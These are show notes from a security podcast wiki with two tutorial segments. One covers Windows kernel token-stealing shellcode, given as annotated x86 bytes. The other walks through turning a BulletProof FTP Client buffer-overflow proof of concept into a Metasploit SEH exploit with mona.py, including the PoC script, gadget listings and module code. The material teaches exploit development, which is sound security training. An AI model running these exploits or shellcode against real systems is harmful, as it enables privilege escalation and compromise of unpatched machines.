Episode351

From Paul's Security Weekly
Jump to: navigation, search
Palo Alto Networks
Tenable Network Security
The SANS Institute
Pwnie Express
Black Hills Information Security
BlackSquirrel
Onapsis

SANS Las Vegas from October 26-27th will debut a new course titled "Embedded Device Security Assessments for the Rest of Us" which will teach students how to assess embedded systems of all varieties on pen tests and in your duties as a security professional. Register Here


Episode Media

MP3 pt1

Announcements

Security Weekly - Episode 351 for Tuesday October 29th, 2013

  • We've released a book on Offensive Countermeasures! Visit tinyurl.com/OCM-Amazon to add this to your summer reading list.
  • We are looking for sponsors for our weekly webcasts and shows. Contact paul -at- hacknaked.tv for details!
  • The Stogie Geeks Show! - Kick some ash with the Stogie Geeks, Thursday nights at 9:00PM EST. Come have a cigar with us! If you are in the Rhode Island area please visit our sponsor the Havana Cigar Club, its an awesome place to have a drink! Make sure you print out your $5.00 off coupon here!

Guest Interview: Dan Philpot

Danphilpott.png

Biography:

Dan Philpott is a Solutions Architect with Natoma Technologies working with Federal customers on cloud computing and federal information security projects. His work focuses on federal information security initiatives including FISMA, cybersecurity, FDCC, USGCB, HSPD-12, risk management and other federal information assurance initiatives


Extended Bio:

Dan Philpott is a Solutions Architect with Natoma Technologies working with Federal customers on cloud computing and federal information security projects. His work focuses on federal information security initiatives including FISMA, cybersecurity, FDCC, USGCB, HSPD-12, risk management and other federal information assurance initiatives. Has worked on federal cloud computing security with the Cloud Security Alliance and has participated in Federal CIO Council cloud and FedRAMP efforts. Founder of FISMApedia.org, information security instructor with Potomac Forum and co-author of "FISMA and the Risk Management Framework" from Syngress. He is fully buzzword compliant and an owner of the coveted Application Security Specialist baseball cap, known in security circles as the ASS hat.



  1. Three words to describe yourself
  2. If you were a serial killer, what would be your weapon of choice?
  3. If you wrote a book about yourself, what would the title be?
  4. In the popular game of Ass Grabby Grabby do you prefer to go first or second?
  5. Stranded in a desert island, which tablet would you bring along: a) iPad b) Surface c) Android d) All of the above e) None of the above?

Tech Segment with Steve Sims from SANS

Stephen-sims.jpg


Biography:

Stephen Sims is an industry expert with over 15 years of experience in information technology and security. Stephen currently works out of San Francisco as a consultant performing reverse engineering, exploit development, threat modeling, and penetration testing.



1) About & Why

The technique of stealing the token of a process with higher privileges in order to achieve privilege escalation is often used during Kernel exploitation.

2) How

Elevating Privileges When it comes to elevating the privileges of the process being used to exploit a Kernel driver vulnerability, there are three primary methods. Depending on the OS version and service pack, you may use SID List Patching, Privileges Patching, or Token Stealing.

SID List Patching – This technique is older and applies to NT 5.x Kernels only. As of NT 6.x Kernels, an integrity check was added to prevent this technique from working. When using this method, the shellcode must resolve the location of the access token from within the current processes’ EPROCESS structure, remove all SID restrictions, replace the SID with that of NT Authority/System, and replace the built in users group SID with that of the Administrators SID.

Privileges Patching – As referenced in the book, “A Guide to Kernel Exploitation,” the Kernel does not perform any checks against the privileges bitmap. This technique involves overwriting this bitmap to add all privileges available. This portion must be down within Kernel space. There is a user mode component to the attack which creates a new token using the API CreateTokenFromCaller() and spawns a new process with that token using SpawnChildWithToken(). This technique is much more complex than the simple SID List Patching method; however, it applies to more modern Kernels.

Token Stealing – This technique simply replaces the pointer to the current processes EPROCESS Token entry with one that has higher privileges. When using this technique the pointer should be repaired as part of the exploit in order to avoid any Kernel inconsistency issues.

Locating the Access Token

kd> dd @fs:[0x124] l1 0030:00000124 81e46020 <-- Pointer to KTHREAD

kd> dd 81e46020+44 l1 81e46064 823c4b30 <-- EPROCESS Address

kd> !process 823c4b30 1 PROCESS 823c4b30 Cid: 0180 Peb:7ffdf000 ParentCid: 00d4

  DirBase:0b500380 ObjectTable:e23a2d20 HandleCount:94
   Image: conhost.exe
   VadRoot 82043be8 Vads 103. Modified 220. Locked 0.
   DeviceMap e21bd998
   Token     e23c6538   <-- Token PTR: We want to replace this with SYSTEM

We would use the following ASM prior to executing our shellcode:

\x33\xc0 – XOR EAX, EAX // We are first zeroing out EAX

\x64\x8b\x80\x24\x01\x00\x00 - MOV EAX, DWORD PTR FS:[EAX+124] // Move into EAX, the pointer to KTHREAD from FS:[0x124]

\x8b\x40\x44 - MOV EAX, DWORD PTR DS:[EAX+44] // Move into EAX, the pointer to EPROCESS from within KTHREAD

\x8b\xc8 – MOV ECX, EAX // Copy into ECX, the pointer to EPROCESS

\x8b\x98\xc8\x00\x00\x00 – MOV EBX, DWORD PTR DS:[EAX+C8] // Copy into EBX, the current processes Access Token PTR

\x89\x1d\xXX\xXX\xXX\xXX – MOV DWORD PTR DS:[XXXXX], EBX // Write the token PTR to memory for restoration later

\x8b\x80\x88\x00\x00\x00 – MOV EAX, DWORD PTR DS:[EAX+88] // Move into EAX the Active Process FLINK PTR

\x81\xe8\x88\x00\x00\x00 – SUB EAX, 88 // Subtract from EAX, 0x88-bytes to get to the next process on the list’s EPROCESS address

\x81\xb8\x84\x00\x00\x00\x04\x00\x00\x00 - CMP DWORD PTR DS:[EAX+94],4 // Compare the UID of the process to 4 to look for the System process

\x75\xe8 – JNZ SHORT 0xe8 // If the compare was not equal (not System), jump back to grab the FLINK of the next process from AP-Links

\x8b\x90\xc8\x00\x00\x00 – MOV EDX, DWORD PTR DS:[EAX+C8] // When we locate the System process, move into EDX, its Access Token PTR

\x8b\xc1 – MOV EAX, ECX // Move into EAX, the preserved EPROCESS address stored in ECX

\x89\x90\xc8\x00\x00\x00 – MOV DWORD PTR DS:[EAX+C8], EDX // Write the address of the System Token to the target processes Token offset for privilege escalation

We would also likely want to restore the token once we are finished elevating our privileges.

Reference: Perla, E, Oldani, M. (2011) A Guide to Kernel Exploitation. San Francisco: Syngress.

Paraphrase and Citation: Sims, Stephen (2013) SEC760: "Advanced Exploit Development for Penetration Testers. Bethesda, MD: SANS Institute

3) References

Where can people find more information about this tool or technique? Are there other guides that you've referenced?

Perla, E, Oldani, M. (2011) A Guide to Kernel Exploitation. San Francisco: Syngress. ISBN-10: 1597494860 ISBN-13: 978-1597494861 http://www.amazon.com/Guide-Kernel-Exploitation-Attacking-Core/dp/1597494860

Russinovich, M., Solomon, D., Ionescu, A. (2012) Windows Internals Part 1. Microsoft Press. ISBN-10: 0735648735 ISBN-13: 978-0735648739 http://www.amazon.com/Windows-Internals-Part-Covering-Server/dp/0735648735/ref=pd_sim_b_1

Russinovich, M., Solomon, D., Ionescu, A. (2012) Windows Internals Part 2. Microsoft Press. ISBN-10: 0735665877 ISBN-13: 978-0735665873 http://www.amazon.com/Windows-Internals-Part-Covering-Server/dp/0735665877/ref=pd_sim_b_1


4) Plugs

Check out the following links for the upcoming course offerrings:

SANS SEC660: "Advanced Penetration Testing, Exploits, and Ethical Hacking" http://www.sans.org/course/advanced-penetration-testing-exploits-ethical-hacking

SANS SEC760: "Advanced Exploit Development for Penetration Testers" http://www.sans.org/course/advance-exploit-development-pentetration-testers

Tech Segment with Rob on Mona.py

About & Why

Mona can be used by pentesters and exploit developers to take a proof of concept crash and turn it into a working exploit in a quick and organized fashion, eliminating downtime.

How

By using the framework Corelanc0d3r has made, it dissects the debugger and can evaluate stack, SEH, ROP & Egg hunters for you and put it out in a nice Metasploit skeleton. I've taken the below from a POC found on exploit-db to a metasploit framework. This tool makes me very excited, even though its been around for a while… I've just found it! And as far as I can tell, no one here has posted anything about it. So… Im going to walk through some basic exploit development with mona.py on Immunity Debugger with the following exploit POC : POC

First, we need to go to corelan to download mona and follow the setup. Which, is honestly a drag and drop operation with a few commands to get mona to output log files correctly (without overwriting)

Now, pretty much every class I've taken on exploit development has relied on metasploit to generate and find memory offsets in the stack, registers & EIP. Mona makes this process simple… Lets take a look:


We tell mona to make us a pattern for the POC, in this case 552 bytes long


!mona pc 552

Mona tells us :

Output generated by mona.py v2.0, rev 447 - Immunity Debugger

Corelan Team - https://www.corelan.be

OS : xp, release 5.1.2600

Process being debugged : _no_name (pid 0)

2013-10-17 16:25:27

Pattern of 552 bytes :

Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7A h8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7 Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3


We take that pattern, completely unique in structure, and inject it into our POC like so:



Exploit Title: BulletProof FTP Client v2010.75.0.76 Local Buffer Overflow

Version: 2010.75.0.76

Date: 2012-03-11

Author: Julien Ahrens

Homepage: http://www.inshell.net

Software Link: http://www.bpftp.com/

Tested on: Windows XP SP3 Professional German

Notes: -

Howto: Import Reg -> Start App

file="poc.reg"

junk1="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3"


poc="Windows Registry Editor Version 5.00\n\n"

poc=poc + "[HKEY_CURRENT_USER\Software\BulletProof Software\BulletProof FTP Client 2010\Options]\n"

poc=poc + "\"LogFileName\"=\"" + junk1 + "\""

try:

print "[*] Creating exploit file...\n";

writeFile = open (file, "w")

writeFile.write( poc )

writeFile.close()

print "[*] File successfully created!";

except:

print "[!] Error while creating file!";



We execute our code, in this case the python file will create a file.reg, the POC tells us why we need to put this in our registry. We then go and open our Bulletproof FTP client.

EBP.png


Look at that! Our pattern is show at EAX and EBP…. great…. so how does that help us?

Im not sure, if i were looking at it normally, i would be looking for EIP… however, there are many ways to get our own code to execute…. lets ask Mona!

We type in :

!Mona findmsp

(alternatively we can find offsets with !mona op xyz)

Findmsp.png

We get the following results:

[+] Looking for cyclic pattern in memory

Cyclic pattern (normal) found at 0x0012fa40 (length 552 bytes)

Stack pivot between 172 & 724 bytes needed to land in this pattern

Cyclic pattern (normal) found at 0x016657d8 (length 552 bytes)

EAX overwritten with normal pattern : 0x41366e41 (offset 408)

EBP (0x0012fbf4) points at offset 436 in normal pattern (length 116)

[+] Examining SEH chain

SEH record (nseh field) at 0x0012fbfc overwritten with normal pattern : 0x7041396f (offset 444), followed by 104 bytes of cyclic data

[+] Examining stack (entire stack) - looking for cyclic pattern

Walking stack from 0x00128000 to 0x0012fffc (0x00007ffc bytes)

0x0012fa40 : Contains normal cyclic pattern at ESP+0xac (+172) : offset 0, length 552 (-> 0x0012fc67 : ESP+0x2d4)

[+] Examining stack (entire stack) - looking for pointers to cyclic pattern

Walking stack from 0x00128000 to 0x0012fffc (0x00007ffc bytes)

0x0012da1c : Pointer into normal cyclic pattern at ESP-0x1f78 (-8056) : 0x0012fa68 : offset 40, length 512

0x0012eb3c : Pointer into normal cyclic pattern at ESP-0xe58 (-3672) : 0x0012fc24 : offset 484, length 68

0x0012eba4 : Pointer into normal cyclic pattern at ESP-0xdf0 (-3568) : 0x0012fc24 : offset 484, length 68

0x0012ebbc : Pointer into normal cyclic pattern at ESP-0xdd8 (-3544) : 0x0012fc24 : offset 484, length 68

0x0012f948 : Pointer into normal cyclic pattern at ESP-0x4c (-76) : 0x0012fa40 : offset 0, length 552

0x0012f954 : Pointer into normal cyclic pattern at ESP-0x40 (-64) : 0x0012fa40 : offset 0, length 552

0x0012f958 : Pointer into normal cyclic pattern at ESP-0x3c (-60) : 0x0012fbf4 : offset 436, length 116

0x0012f960 : Pointer into normal cyclic pattern at ESP-0x34 (-52) : 0x0012fa40 : offset 0, length 552

0x0012f99c : Pointer into normal cyclic pattern at ESP+0x8 (+8) : 0x0012fbf4 : offset 436, length 116

0x0012f9a0 : Pointer into normal cyclic pattern at ESP+0xc (+12) : 0x0012fbfc : offset 444, length 108

0x0012f9a8 : Pointer into normal cyclic pattern at ESP+0x14 (+20) : 0x0012fbf4 : offset 436, length 116

0x0012fa0c : Pointer into normal cyclic pattern at ESP+0x78 (+120) : 0x0012fb44 : offset 260, length 292

0x0012fcf8 : Pointer into normal cyclic pattern at ESP+0x364 (+868) : 0x016657d8 : offset 0, length 552

Wow, it took Mona a couple seconds to do that…. It might of taken me a while to figure all that out.

In this particular instance, the following is interesting :

[+] Examining SEH chain

SEH record (nseh field) at 0x0012fbfc overwritten with normal pattern : 0x7041396f (offset 444), followed by 104 bytes of cyclic data

Lets go look at that in the stack:


Stack.png


Alright, so this is an SEH overwrite exploit, so lets ask mona what to do:

!mona SEH

Our list of Pop Pop Ret:

Poppopret.png


0x004080d7 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x0040f1d8 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x0040f33c : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x004124b8 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x0041e207 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x0041e248 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x0041fa2c : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x004237b8 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x0042467b : pop ecx # pop ebp # ret 0x04 | startnull,asciiprint,ascii {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x004246bf : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x004273f1 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x0042ecb2 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x004329c3 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x004333fe : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x00433429 : pop ecx # pop ebp # ret 0x04 | startnull,asciiprint,ascii {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x00434a20 : pop ecx # pop ebp # ret 0x04 | startnull,asciiprint,ascii,alphanum {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x00434b25 : pop ecx # pop ebp # ret 0x04 | startnull,asciiprint,ascii {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x0043a5a7 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x0043a9bd : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x0043d1ca : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x0043d1f4 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x00444539 : pop ecx # pop ebp # ret 0x04 | startnull,asciiprint,ascii,alphanum,uppernum {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

(this is a partial list)

!mona suggest

This is rather interesting, Mona will give us a metasploit module based on the information in findmsp

Monasuggest.png

Output:

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

 #Rank definition: http://dev.metasploit.com/redmine/projects/framework/wiki/Exploit_Ranking
 #ManualRanking/LowRanking/AverageRanking/NormalRanking/GoodRanking/GreatRanking/ExcellentRanking
 Rank = NormalRanking
 include Msf::Exploit::Remote::Tcp
 include Msf::Exploit::Seh
 def initialize(info = {})
   super(update_info(info,
     'Name'    => 'insert name for the exploit',
     'Description'  => %q{
         Provide information about the vulnerability / explain as good as you can
         Make sure to keep each line less than 100 columns wide
     },
     'License'    => MSF_LICENSE,
     'Author'    =>
       [
         'insert_name_of_person_who_discovered_the_vulnerability<user[at]domain.com>',  # Original discovery
         '<insert your name here>',  # MSF Module
       ],
     'References'  =>
       [
         [ 'OSVDB', '<insert OSVDB number here>' ],
         [ 'CVE', 'insert CVE number here' ],
         [ 'URL', '<insert another link to the exploit/advisory here>' ]
       ],
     'DefaultOptions' =>
       {
         'ExitFunction' => 'process', #none/process/thread/seh
         #'InitialAutoRunScript' => 'migrate -f',
       },
     'Platform'  => 'win',
     'Payload'  =>
       {
         'BadChars' => "", # <change if needed>
         'DisableNops' => true,
       },
     'Targets'    =>
       [
         [ '<fill in the OS/app version here>',
           {
             'Ret'     =>  0x007ecfef, # pop ebx # pop ebp # ret  - bpftpclient.exe
             'Offset'  =>  444
           }
         ],
       ],
     'Privileged'  => false,
     #Correct Date Format: "M D Y"
     #Month format: Jan,Feb,Mar,Apr,May,Jun,Jul,Aug,Sep,Oct,Nov,Dec
     'DisclosureDate'  => 'MONTH DAY YEAR',
     'DefaultTarget'  => 0))
   register_options([Opt::RPORT(21)], self.class)
 end
 def exploit


   connect
   buffer = rand_text(target['Offset'])  #junk
   buffer << generate_seh_record(target.ret)
   buffer << payload.encoded  #104 bytes of space
   # more junk may be needed to trigger the exception
   print_status("Trying target #{target.name}...")
   sock.put(buffer)
   handler
   disconnect
 end

end

amazing stuff!!!

Stay tuned for some more exploit fun!!!


References

https://www.corelan.be/

https://www.corelan.be/index.php/category/security/exploit-writing-tutorials/

http://redmine.corelan.be/projects/mona


(Tutorials and Mona.py are all by Corelanc0d3r, i take no credit, I just think its an awesome tool!)

Plugs

@rkornmeyer


Stories

Paul's Stories

Larry's Stories

Allison's Stories

Jack's Stories